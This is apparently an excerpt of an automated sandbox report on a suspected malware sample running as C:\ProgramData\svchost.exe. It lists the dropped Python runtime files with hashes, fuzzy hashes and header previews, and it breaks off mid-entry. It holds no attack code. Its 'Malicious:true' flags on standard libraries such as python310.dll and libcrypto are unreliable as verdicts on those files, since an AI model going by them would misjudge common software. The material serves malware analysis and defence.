                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                          MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                          SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                          SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                          SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography-42.0.5.dist-info\LICENSE.BSD

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1532
                                                                                                                                                          Entropy (8bit):5.058591167088024
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                          MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                          SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                          SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                          SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography-42.0.5.dist-info\METADATA

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5430
                                                                                                                                                          Entropy (8bit):5.111831778200942
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:DxZpqZink/QIHQIyzQIZQILuQIR8vtklGovuxNx6rIWwCvCCcT+vIrrr9B+M6VwP:xJnkoBs/stL18cT+vIrrxsM6VwDjyeyM
                                                                                                                                                          MD5:AD313397AABF8AF5D234DF73C901CB4D
                                                                                                                                                          SHA1:B213A420B73EACF37409BC428812B3E17F1C12C9
                                                                                                                                                          SHA-256:65479522961A5B9B1C4811232C4133DDC8BDA9BBBC7562B81EF76857A2A2475A
                                                                                                                                                          SHA-512:468BD32AABA49839D4A4752108A378954900037588B7095B318179D64F76F4302ADEBCFA1664CEE5CC390AD0EEA79A611A7B5C372548FEA22DF77C2A459DA2AF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:Metadata-Version: 2.1..Name: cryptography..Version: 42.0.5..Summary: cryptography is a package which provides cryptographic recipes and primitives to Python developers...Author-email: The Python Cryptographic Authority and individual contributors <cryptography-dev@python.org>..License: Apache-2.0 OR BSD-3-Clause..Project-URL: homepage, https://github.com/pyca/cryptography..Project-URL: documentation, https://cryptography.io/..Project-URL: source, https://github.com/pyca/cryptography/..Project-URL: issues, https://github.com/pyca/cryptography/issues..Project-URL: changelog, https://cryptography.io/en/latest/changelog/..Classifier: Development Status :: 5 - Production/Stable..Classifier: Intended Audience :: Developers..Classifier: License :: OSI Approved :: Apache Software License..Classifier: License :: OSI Approved :: BSD License..Classifier: Natural Language :: English..Classifier: Operating System :: MacOS :: MacOS X..Classifier: Operating System :: POSIX..Classifier: Operating Syst

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography-42.0.5.dist-info\RECORD

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:CSV text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15325
                                                                                                                                                          Entropy (8bit):5.566095103726107
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:GXPJofR5jF4e+6tkh4v4Ko29vZ6W1HepPN+NXwvn5ZnM:GXOfbCWPoIvZ6W1HepPN+9wvnA
                                                                                                                                                          MD5:63C3E2671FC695972FAC7F7FA26CA3DB
                                                                                                                                                          SHA1:58A52CA7E0B6F9DE0E89E1DA799EBBD7898D635E
                                                                                                                                                          SHA-256:A443A65BFFDE342F60CA1267DAB2229514073F64AB1BCC08CCCEF42FC015C16D
                                                                                                                                                          SHA-512:4773FC277B176EDC3872D654992B53BF247B8E3ED87D40C43A5ACEB593C88E03EB6E0E200145EEB66C3B0ACDBA4B77107279C2681840405E88AD195976779D87
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:cryptography-42.0.5.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-42.0.5.dist-info/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-42.0.5.dist-info/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-42.0.5.dist-info/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography-42.0.5.dist-info/METADATA,sha256=ZUeVIpYaW5scSBEjLEEz3ci9qbu8dWK4HvdoV6KiR1o,5430..cryptography-42.0.5.dist-info/RECORD,,..cryptography-42.0.5.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-42.0.5.dist-info/WHEEL,sha256=ZzJfItdlTwUbeh2SvWRPbrqgDfW_djikghnwfRmqFIQ,100..cryptography-42.0.5.dist-info/top_level.txt,sha256=KNaT-Sn2K4uxNaEbe6mYdDn3qWDMlp4y-MtWfB73nJc,13..cryptography/__about__.py,sha256=Q_dIPaB2u54kbfNQMzqmbel-gbG6RC5vWzO6OSFDGqM,445..cryptography/__init__.py,sha256=iVPlBlXWTJyiFeRedxcbMPhyHB34viOM10d72vGnWuE,364..cryptography/__pycache__/_

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography-42.0.5.dist-info\WHEEL

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):100
                                                                                                                                                          Entropy (8bit):5.0203365408149025
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:RtEeX7MWcSlVlbY3KgP+tkKciH/KQLn:RtBMwlVCxWKTQLn
                                                                                                                                                          MD5:C48772FF6F9F408D7160FE9537E150E0
                                                                                                                                                          SHA1:79D4978B413F7051C3721164812885381DE2FDF5
                                                                                                                                                          SHA-256:67325F22D7654F051B7A1D92BD644F6EBAA00DF5BF7638A48219F07D19AA1484
                                                                                                                                                          SHA-512:A817107D9F70177EA9CA6A370A2A0CB795346C9025388808402797F33144C1BAF7E3DE6406FF9E3D8A3486BDFAA630B90B63935925A36302AB19E4C78179674F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.42.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64..

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography-42.0.5.dist-info\top_level.txt

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13
                                                                                                                                                          Entropy (8bit):3.2389012566026314
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:cOv:Nv
                                                                                                                                                          MD5:E7274BD06FF93210298E7117D11EA631
                                                                                                                                                          SHA1:7132C9EC1FD99924D658CC672F3AFE98AFEFAB8A
                                                                                                                                                          SHA-256:28D693F929F62B8BB135A11B7BA9987439F7A960CC969E32F8CB567C1EF79C97
                                                                                                                                                          SHA-512:AA6021C4E60A6382630BEBC1E16944F9B312359D645FC61219E9A3F19D876FD600E07DCA6932DCD7A1E15BFDEAC7DBDCEB9FFFCD5CA0E5377B82268ED19DE225
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:cryptography.

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography\hazmat\bindings\_rust.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7218176
                                                                                                                                                          Entropy (8bit):6.56234593155449
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:1CPfKk+AGdmA+xiIfIBE7S2ohqc/3J2y:gPfr3GdmAwjABE7S2ogiJ
                                                                                                                                                          MD5:12A7C0D35CCBD002150BB29DDD7E8440
                                                                                                                                                          SHA1:F16D9A4654DC76B3CFADA387FF7BDDDB0B18B79A
                                                                                                                                                          SHA-256:7E22D579AC503B959268964102C03D4E96C8A9B74186158B8C82FDC8CF9D9522
                                                                                                                                                          SHA-512:C9E5E68DE8F51F91CBBA839B4FECE1DB4DA7480890A6C7318A78DEAA30191FCB8913BA447F45D4AE93B986F3246F09F8CC721E781CE020110A3BB5628B3EF9F7
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........r.Fs..Fs..Fs..O...Ts.....Ds.....Ws.....Ns.....Bs..|...Ds..Fs..gq.....Ws..)...0p.....Gs..Fs...s.....Gs.....Gs..RichFs..........................PE..d....A.e.........." ...'.jS...........R.......................................n...........`.........................................`.h.p.....h.|............Pj..M............m......7c.T....................8c.(....6c.@.............S..............................text....hS......jS................. ..`.rdata........S......nS.............@..@.data....!... i.......i.............@....pdata...M...Pj..N....i.............@..@.reloc........m......Dm.............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\libcrypto-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3450648
                                                                                                                                                          Entropy (8bit):6.098075450035195
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:YP+uemAdn67xfxw6rKsK1CPwDv3uFfJz1CmiX:OZemAYxfxw6HK1CPwDv3uFfJzUmA
                                                                                                                                                          MD5:9D7A0C99256C50AFD5B0560BA2548930
                                                                                                                                                          SHA1:76BD9F13597A46F5283AA35C30B53C21976D0824
                                                                                                                                                          SHA-256:9B7B4A0AD212095A8C2E35C71694D8A1764CD72A829E8E17C8AFE3A55F147939
                                                                                                                                                          SHA-512:CB39AA99B9D98C735FDACF1C5ED68A4D09D11F30262B91F6AA48C3F8520EFF95E499400D0CE7E280CA7A90FF6D7141D2D893EF0B33A8803A1CADB28BA9A9E3E2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........].q...q...q....M..q.......q.......q.......q.......q...q..[q.......q.......q.......s.......q....!..q.......q..Rich.q..........................PE..d......c.........." ..."..$.................................................. 5......%5...`.........................................../..h...Z4.@.....4.|.....2......x4../....4..O....-.8.............................-.@............P4..............................text.....$.......$................. ..`.rdata..&.....%.......$.............@..@.data...!z....2..,....1.............@....pdata........2.......2.............@..@.idata..^#...P4..$....3.............@..@.00cfg..u.....4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\libffi-7.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):32792
                                                                                                                                                          Entropy (8bit):6.3566777719925565
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:2nypDwZH1XYEMXvdQOsNFYzsQDELCvURDa7qscTHstU0NsICwHLZxXYIoBneEAR8:2l0Vn5Q28J8qsqMttktDxOpWDG4yKRF
                                                                                                                                                          MD5:EEF7981412BE8EA459064D3090F4B3AA
                                                                                                                                                          SHA1:C60DA4830CE27AFC234B3C3014C583F7F0A5A925
                                                                                                                                                          SHA-256:F60DD9F2FCBD495674DFC1555EFFB710EB081FC7D4CAE5FA58C438AB50405081
                                                                                                                                                          SHA-512:DC9FF4202F74A13CA9949A123DFF4C0223DA969F49E9348FEAF93DA4470F7BE82CFA1D392566EAAA836D77DDE7193FED15A8395509F72A0E9F97C66C0A096016
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.3.r}]Ar}]Ar}]A{..Ap}]A .\@p}]A..\@q}]Ar}\AU}]A .X@~}]A .Y@z}]A .^@q}]A..Y@t}]A..^@s}]A..]@s}]A.._@s}]ARichr}]A........................PE..d......].........." .....F...$.......I....................................................`..........................................j.......m..P....................f...............b...............................b...............`.. ............................text....D.......F.................. ..`.rdata..H....`.......J..............@..@.data................^..............@....pdata...............`..............@..@.reloc...............d..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\libssl-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):704792
                                                                                                                                                          Entropy (8bit):5.5573527806738126
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:WhO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0TGqwfU2lvz2:2is/POtrzbLp5dQ0TGqcU2lvz2
                                                                                                                                                          MD5:BEC0F86F9DA765E2A02C9237259A7898
                                                                                                                                                          SHA1:3CAA604C3FFF88E71F489977E4293A488FB5671C
                                                                                                                                                          SHA-256:D74CE01319AE6F54483A19375524AA39D9F5FD91F06CF7DF238CA25E043130FD
                                                                                                                                                          SHA-512:FFBC4E5FFDB49704E7AA6D74533E5AF76BBE5DB297713D8E59BD296143FE5F145FBB616B343EED3C48ECEACCCCC2431630470D8975A4A17C37EAFCC12EDD19F4
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1}q.1}q.1}q.8..=}q.~.p.3}q.z.p.3}q.~.t.=}q.~.u.9}q.~.r.5}q...p.2}q.1}p..|q...u..}q...q.0}q.....0}q...s.0}q.Rich1}q.........PE..d......c.........." ...".D...T......<................................................i....`..........................................A...N..@U..........s........N......./......h.......8...............................@............@..@............................text....B.......D.................. ..`.rdata.../...`...0...H..............@..@.data...AM.......D...x..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............l..............@..@.rsrc...s............n..............@..@.reloc..q............v..............@..B................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\nacl\_sodium.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):348672
                                                                                                                                                          Entropy (8bit):6.620074456825018
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:PS8ZHilzJNijWKvNpwNasFp2HX5l5XBMC+ZSHUV50DErV4c+:PSEilzJNijfpOSjDz
                                                                                                                                                          MD5:9D1B8BAD0E17E63B9D8E441CDC15BAEE
                                                                                                                                                          SHA1:0C5A62135B072D1951A9D6806B9EFF7AA9C897A3
                                                                                                                                                          SHA-256:D733C23C6A4B21625A4FF07F6562BA882BCBDB0F50826269419D8DE0574F88CD
                                                                                                                                                          SHA-512:49E7F6AB825D5047421641ED4618FF6CB2A8D22A8A4AE1BD8F2DEEFE7987D80C8E0ACC72B950D02214F7B41DC4A42DF73A7F5742EBC96670D1C5A28C47B97355
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................................a.........................................................................r.............Rich............PE..d......a.........." .........@......P.....................................................`.............................................P............p.......P..(...............|...@...............................`...8............0...............................text...H........................... ..`.rdata.......0......................@..@.data....8.......2..................@....pdata..(....P.......,..............@..@.rsrc........p.......J..............@..@.reloc..|............L..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\pyexpat.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):198936
                                                                                                                                                          Entropy (8bit):6.372446720663998
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:13BAJzkk5dT6F62eqf2A3zVnjIHdAPKReewMP12yGUfT0+SYyWgOmrpjAxvwnVIq:FQg4dT6N5OA3zVnjNed4yGKTKR/
                                                                                                                                                          MD5:1118C1329F82CE9072D908CBD87E197C
                                                                                                                                                          SHA1:C59382178FE695C2C5576DCA47C96B6DE4BBCFFD
                                                                                                                                                          SHA-256:4A2D59993BCE76790C6D923AF81BF404F8E2CB73552E320113663B14CF78748C
                                                                                                                                                          SHA-512:29F1B74E96A95B0B777EF00448DA8BD0844E2F1D8248788A284EC868AE098C774A694D234A00BD991B2D22C2372C34F762CDBD9EC523234861E39C0CA752DCAA
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7...sn.Jsn.Jsn.Jz.:J.n.J!..Kqn.J!..K.n.J!..K{n.J!..Kpn.J...Kqn.J8..Kpn.Jsn.J.n.J...Kwn.J...Krn.J..VJrn.J...Krn.JRichsn.J................PE..d.....,d.........." ......................................................................`.........................................p...P................................/...........4..T...........................05..8............ ...............................text............................... ..`.rdata....... ......................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\python3.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):66328
                                                                                                                                                          Entropy (8bit):6.162953246481027
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:t68LeBLeeFtp5V1BfO2yvSk70QZF1nEyjnskQkr/RFB1qucwdBeCw0myou6ZwJqn:t6wewnvtjnsfwxVILL0S7SyuPxHO
                                                                                                                                                          MD5:FD4A39E7C1F7F07CF635145A2AF0DC3A
                                                                                                                                                          SHA1:05292BA14ACC978BB195818499A294028AB644BD
                                                                                                                                                          SHA-256:DC909EB798A23BA8EE9F8E3F307D97755BC0D2DC0CB342CEDAE81FBBAD32A8A9
                                                                                                                                                          SHA-512:37D3218BC767C44E8197555D3FA18D5AAD43A536CFE24AC17BF8A3084FB70BD4763CCFD16D2DF405538B657F720871E0CD312DFEB7F592F3AAC34D9D00D5A643
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........A.d.A.d.A.d...l.@.d...d.@.d.....@.d...f.@.d.RichA.d.........PE..d.....,d.........." .................................................................x....`.........................................`...`................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\python310.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4458776
                                                                                                                                                          Entropy (8bit):6.460390021076921
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:myrXfGIy+Bqk5c5Ad2nwZT3Q6wsV136cR2DZvbK30xLNZcAgVBvcpYcvl1IDWbH3:Uw5tVBlicWdvoDkHUMF7Ph/qe
                                                                                                                                                          MD5:63A1FA9259A35EAEAC04174CECB90048
                                                                                                                                                          SHA1:0DC0C91BCD6F69B80DCDD7E4020365DD7853885A
                                                                                                                                                          SHA-256:14B06796F288BC6599E458FB23A944AB0C843E9868058F02A91D4606533505ED
                                                                                                                                                          SHA-512:896CAA053F48B1E4102E0F41A7D13D932A746EEA69A894AE564EF5A84EF50890514DECA6496E915AAE40A500955220DBC1B1016FE0B8BCDDE0AD81B2917DEA8B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<...<...<...I...<...Sc..<...I...<...I...<...I...<...D...<...D...<...<...=..+I../<..+I...<..+Ia..<..+I...<..Rich.<..........................PE..d.....,d.........." .....V#..v!...............................................E.....".D...`.........................................`.<.....@.=.|.....D......`B.......C../....D..t....$.T...........................P.$.8............p#.8............................text...bT#......V#................. ..`.rdata...B...p#..D...Z#.............@..@.data... .....=.......=.............@....pdata.......`B......HA.............@..@PyRuntim`....pD......VC.............@....rsrc.........D......ZC.............@..@.reloc...t....D..v...dC.............@..B........................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\select.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29976
                                                                                                                                                          Entropy (8bit):6.627859470728624
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:gUC2hwhVHqOmEVILQG35YiSyvrYPxWEl6:FC2ehVKOmEVILQGp7SyEPxe
                                                                                                                                                          MD5:A653F35D05D2F6DEBC5D34DADDD3DFA1
                                                                                                                                                          SHA1:1A2CEEC28EA44388F412420425665C3781AF2435
                                                                                                                                                          SHA-256:DB85F2F94D4994283E1055057372594538AE11020389D966E45607413851D9E9
                                                                                                                                                          SHA-512:5AEDE99C3BE25B1A962261B183AE7A7FB92CB0CB866065DC9CD7BB5FF6F41CC8813D2CC9DE54670A27B3AD07A33B833EAA95A5B46DAD7763CA97DFA0C1CE54C9
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........!.F.O.F.O.F.O.O...D.O...N.D.O...J.M.O...K.N.O...L.B.O...N.D.O.F.N...O...N.C.O...B.G.O...O.G.O....G.O...M.G.O.RichF.O.................PE..d.....,d.........." .........0......................................................;\....`.........................................`@..L....@..x....p.......`.......F.../......H....2..T............................2..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......4..............@....pdata.......`.......6..............@..@.rsrc........p.......:..............@..@.reloc..H............D..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\ucrtbase.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1016584
                                                                                                                                                          Entropy (8bit):6.669319438805479
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:VkmZDEMHhp9v1Ikbn3ND0TNVOsIut8P4zmxvSZX0yplkA:mmZFHhp9v1Io3h0TN3pvkA
                                                                                                                                                          MD5:0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
                                                                                                                                                          SHA1:4189F4459C54E69C6D3155A82524BDA7549A75A6
                                                                                                                                                          SHA-256:8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
                                                                                                                                                          SHA-512:A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\unicodedata.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1123608
                                                                                                                                                          Entropy (8bit):5.3853088605790385
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:6mwlRMmuZ63NTQCb5Pfhnzr0ql8L8kcM7IRG5eeme6VZyrIBHdQLhfFE+uQfk:ulRuUZV0m8UMMREtV6Vo4uYQfk
                                                                                                                                                          MD5:81D62AD36CBDDB4E57A91018F3C0816E
                                                                                                                                                          SHA1:FE4A4FC35DF240B50DB22B35824E4826059A807B
                                                                                                                                                          SHA-256:1FB2D66C056F69E8BBDD8C6C910E72697874DAE680264F8FB4B4DF19AF98AA2E
                                                                                                                                                          SHA-512:7D15D741378E671591356DFAAD4E1E03D3F5456CBDF87579B61D02A4A52AB9B6ECBFFAD3274CEDE8C876EA19EAEB8BA4372AD5986744D430A29F50B9CAFFB75D
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........$z.eJ).eJ).eJ)...).eJ)..K(.eJ)..O(.eJ)..N(.eJ)..I(.eJ)|.K(.eJ)..K(.eJ).eK).eJ)|.G(.eJ)|.J(.eJ)|..).eJ)|.H(.eJ)Rich.eJ)........................PE..d.....,d.........." .....B.......... *.......................................@......Q.....`.............................................X............ ..........H......../...0.......`..T........................... a..8............`..x............................text...9A.......B.................. ..`.rdata.......`.......F..............@..@.data...............................@....pdata..H...........................@..@.rsrc........ ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI80762\wrapt\_wrappers.cp310-win_amd64.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\ProgramData\svchost.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):36352
                                                                                                                                                          Entropy (8bit):5.307092802083391
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:frtPrRtr4IXhjSwZQ41tsSWEJwrhmf6mvgkoOIB/5k7jKWboNeMCKAODeNaoL5I1:f5br54WmB/aENyKAODhSoLkCpIk
                                                                                                                                                          MD5:7E65EFC6C3B12A403A110056141FF14E
                                                                                                                                                          SHA1:144845210FE97AF7D8570713BAE944CCBBD9BF16
                                                                                                                                                          SHA-256:8267AC2A59BA26CDAF4B347A8C92D26ACB1E261AFFFFE1D160F9153372363A64
